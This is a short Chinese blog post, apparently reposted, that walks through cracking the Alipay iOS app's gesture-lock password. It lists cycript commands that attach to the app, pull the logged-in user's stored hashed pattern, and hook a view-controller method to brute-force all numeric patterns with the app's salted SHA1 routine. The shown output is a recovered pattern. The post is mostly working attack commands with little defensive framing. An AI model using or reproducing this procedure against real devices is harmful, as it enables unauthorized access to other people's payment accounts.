探究支付宝app手势密码
来源:互联网 发布:大数据与实体经济融合 编辑:程序博客网 时间:2024/05/16 12:18
续前人http://blog.csdn.net/yiyaaixuexi/article/details/18520053
本文在支付宝8.4上测试
1.cycript附到支付宝进程
cycript -p pid
2.获取当前手势密码页面
cy# vc=[UIApplication sharedApplication].keyWindow.rootViewController.topViewController
#"<ColorFaceUnlockViewController: 0x2dd30e0>"
获取当前登录用户信息
cy# user = [[DFContext sharedContext] findServiceByName:@"SAAccountService"].userInfo
3.破解密码
支付宝手密由1-9数字
随便找个函数替换掉实现。函数中遍历所有密码,并用支付宝的sha1加密函数加密,然后和用户信息中的手密字段进行比较
cy# ColorFaceUnlockViewController.messages['viewDidLoad']=<span style="font-family: Arial, Helvetica, sans-serif;">function (){</span>for(i = 999;i < 999999999; ++i){ pwd = [AccountInfoUtils sha1TextWithSalt:i.toString() withUserId:user.userId]; if([pwd isEqual:user.gesturePassword]){ result = i.toString(); }}}由于执行时间较长,放到后台线程跑
cy# [vc performSelectorInBackground:@selector(viewDidLoad) withObject:nil];1分钟后看看结果
cy# result"523698741"
0 0
- 探究支付宝app手势密码
- 仿支付宝手势密码
- iOS安全攻防(十四):Hack实战——支付宝app手势密码校验欺骗
- 支付宝手势密码安全吗?
- Vue2 手势解锁密码 / 支付宝手势解锁
- [Android开发实战]Android手势密码(支付宝手势密码)实现(支持2.x)
- 类是支付宝的手势密码控件
- 仿支付宝手势密码头部小九宫格绘制
- Android——实现支付宝手势密码
- ios hack实战:获取支付宝手势密码(支付宝版本8.0)
- 支付宝钱包手势密码破解实战(root过的手机可直接绕过手势密码)
- 支付宝钱包手势密码破解实战(root过的手机可直接绕过手势密码)
- [Android] [危险!]支付宝钱包手势密码实战破解(root过的手机可直接绕过手势密码
- 支付宝钱包手势密码破解实战(root过的手机可直接绕过手势密码)
- app支付--支付宝支付
- 支付-支付宝APP支付
- 支付--支付宝APP支付
- APP支付宝支付
- BETWEENT AND
- WEB项目中log4j.properties配置
- 大话设计模式C++实现-第28章-访问者模式
- oracle创建表之前判断表是否存在,如果存在则删除已有表
- FreeRTOS源码解析 -> xTaskCreate()
- 探究支付宝app手势密码
- 标签云
- An internal error occurred during: "Launching xxx on MyEclipse Tomcat 7"---myeclipse/eclipse
- 微信公众平台消息接口PHP版开发教程
- LDD读书笔记_内存管理
- javascript 与 webview 交互
- 自动生成@3x图
- 一些博客
- MATH相关概念